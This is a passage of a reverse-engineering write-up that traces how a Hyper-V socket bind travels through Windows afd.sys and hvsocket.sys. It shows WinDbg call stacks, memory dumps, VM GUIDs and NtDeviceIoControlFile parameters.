<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then afd!AfdTLIoControl is caused (before a call rather big set of parameters is formed), the first parameter the pointer on the hvsocket!VmbusTlEndpointIoControlEndpoint function, which then is also carried out. Then hvsocket! VmbusTlHandleEndpointIoControl is caused. During execution we receive a recursion:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">this time hvsocket!VmbusTlContainerGetVmId is caused from hvsocket!VmbusTlHandleEndpointIoControl. Next hvsocket! VmbusTlFindAndReferencePartitionByContainerId is caused. In the first parameter of function on +80h the coherent list:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!list @rcx+80h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb00 ffffda85`27f009e8 ffffda85`27f009e8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb10 00000000`00000001 ffffda85`27f6bb18</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb20 ffffda85`27f6bb18 ffffda85`27f00910</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb30 00000000`00000000 0000257a`d80d0eb8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb40 ffffda85`27f2de20 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb50 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb60 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb70 00000000`00000000 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f009e8 ffffda85`27f6bb00 ffffda85`27f6bb00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f009f8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4f790d35`90db8b89 cdb7c80a`ea49e98c – HV_CHILD_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a08 00000000`00000000 ffffda85`27f00a10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a18 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a28 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a38 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a48 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a58 fffff803`db9516c0 fffff803`db951db0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If to turn on the guest virtual machine, then one more element will appear</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e490e8 ffffb08b`923a9700 ffffb08b`924390e8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e490f8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4a741d87`6a964317 0089049b`a646f9ab – GUID of the switched-on VM in which a client part of our application will be started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49108 00000000`00000001 ffffb08b`93e49110</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49118 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49128 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49138 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49148 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49158 fffff805`2dfc16c0 fffff805`2dfc1db0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This function make search in this coherent list and returns structure which on offset +E8h contains the pointer on HV_GUID_CHILDREN, if the 2nd parameter transferred to the hvsocket! VmbusTlContainerGetVmId function coincides with the value placed on offset +18Ch this structure. Further afd!AfdTLBindGetAddrComplete.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stack (we still in afd!AfdTLBindComplete2)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindGetAddrComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in which tdi!TdiCopyBufferToMdl is caused</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The copied buffer looks as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`274bf180 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ".......5.yO..I. - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`274bf190 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> b1d00d3e 4570fe10 487662ad ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`274bf1a0 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After copying nt!MmUnlockPages and nt!ioFreeMdl are caused consistently, and then nt!IofCompleteRequest. Execution of afd! AfdTlBindSecurity was finished. In EAX again writes 103h. As we saw earlier, this value will be returned by the NtDeviceIoControlFile function. In this case mswsock!SockWaitForSingleObject is caused in addition.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 1223088 1223088+24 – UserBuffer contents after execution of NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223088 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ".......5.yO..I.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223098 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">012230a8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In usermode, as well as when socket call, mswsock!SockSetHandleContext is caused, then NtDeviceIoControlFile is caused again:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint). On client \Device\Afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F600</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 12047 (afd!AfdDispatchImmediateIrp)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F608</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,D4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inputbuffer:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd 00F6F608 00F6F608+d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f608 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000001 00000022 00000001 00000001 – parameters from the socket provider section in registry (partition Hyper-V RAW)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f618 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000024 00000024 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f628 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00010000 00010000 00001000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f638 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 000003e9 00020026 00000008</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f648 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f658 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f668 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00000000 1234191b 4ca74bf7</span></div>
